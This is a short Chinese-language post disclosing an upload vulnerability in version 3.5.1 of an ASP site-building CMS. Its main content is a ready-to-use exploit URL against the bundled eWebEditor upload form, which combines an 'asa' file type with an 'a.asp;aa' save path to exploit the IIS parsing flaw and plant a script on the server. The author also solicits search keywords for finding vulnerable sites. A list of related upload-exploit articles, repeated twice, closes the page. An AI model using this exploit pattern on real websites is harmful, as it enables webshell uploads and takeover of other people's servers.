程序:深度学习asp整站系统
版本:Ver3.5.1,之前的版本未测试,不过应该存在相同的漏洞吧
漏洞:上传漏洞,ewebeditor编辑器利用
ewebeditor编辑器地址 \admin\include\eWebEditor 这个大家都知道的
上传漏洞的话,配合IIS解析漏洞就可以了。
利用地址是:http://www.st999.cn/blog/admin/include/upload_form.asp?
action=add&MaxSize=512000&FileType=asa&SavePath=../../photo/uploadFile/photo/uploadfile/a.as
p;aa&parentBackValue=form1.PhotoUrl&saveName=0
这个程序的关键字不好找,大家如果找出来了,希望能给我留下言,来我blog留言也可以 http://www.st999.cn/blog
利用文件在附件里
只显示10条记录相关文章
分享网络商城购物系统v3.0全功能版 上传漏洞 (浏览: 15347, 评论: 0)
upfile 又一奇迹般的突破 (浏览: 8327, 评论: 0)
无忧购物系统ASP通用版 V2010.9.17 ---- 上传漏洞 (浏览: 10157, 评论: 0)
无忧购物系统ASP时尚版上传漏洞 (浏览: 10086, 评论: 0)
微尔文章系统v1.51 (修正版)上传漏洞 (浏览: 10680, 评论: 0)
Es_Cms上传漏洞利用 (浏览: 9475, 评论: 0)
良精微博系统上传漏洞 (浏览: 12714, 评论: 0)
尘月网络企业网站管理系统2010生成HTML专业版之上传漏洞 (浏览: 11701, 评论: 0)
一个上传文件的分析笔记 (浏览: 10562, 评论: 0)
上传漏洞hidden to text 突破手记 (浏览: 11180, 评论: 0)
upfile 又一奇迹般的突破 (浏览: 8327, 评论: 0)
无忧购物系统ASP通用版 V2010.9.17 ---- 上传漏洞 (浏览: 10157, 评论: 0)
无忧购物系统ASP时尚版上传漏洞 (浏览: 10086, 评论: 0)
微尔文章系统v1.51 (修正版)上传漏洞 (浏览: 10680, 评论: 0)
Es_Cms上传漏洞利用 (浏览: 9475, 评论: 0)
良精微博系统上传漏洞 (浏览: 12714, 评论: 0)
尘月网络企业网站管理系统2010生成HTML专业版之上传漏洞 (浏览: 11701, 评论: 0)
一个上传文件的分析笔记 (浏览: 10562, 评论: 0)
上传漏洞hidden to text 突破手记 (浏览: 11180, 评论: 0)